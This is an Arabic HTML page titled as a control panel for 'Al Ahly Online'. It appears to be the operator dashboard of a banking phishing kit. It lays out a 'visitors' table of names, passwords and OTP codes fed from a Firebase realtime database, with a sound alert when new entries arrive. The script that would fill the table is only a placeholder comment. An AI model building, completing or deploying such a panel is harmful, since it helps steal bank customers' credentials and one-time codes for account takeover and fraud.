
<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
  <meta charset="UTF-8">
  <title>لوحة التحكم - الأهلي أونلاين</title>
  <link rel="stylesheet" href="../style.css">
</head>
<body>
  <div class="container">
    <h2>لوحة التحكم - الزوار</h2>
    <table border="1" style="margin: auto; width: 80%; text-align: center;">
      <thead>
        <tr><th>الاسم</th><th>كلمة المرور</th><th>OTP</th><th>التحكم</th></tr>
      </thead>
      <tbody id="dataTable">
        <tr><td>...</td><td>...</td><td>...</td><td>...</td></tr>
      </tbody>
    </table>
  </div>
  <audio id="notifySound" src="../0000915.mp3" preload="auto"></audio>
  <script src="https://www.gstatic.com/firebasejs/8.10.0/firebase-app.js"></script>
  <script src="https://www.gstatic.com/firebasejs/8.10.0/firebase-database.js"></script>
  <script src="../firebase-config.js"></script>
  <script>
    // كود لعرض بيانات الزوار والتنبيه الصوتي عند التحديث
  </script>
</body>
</html>
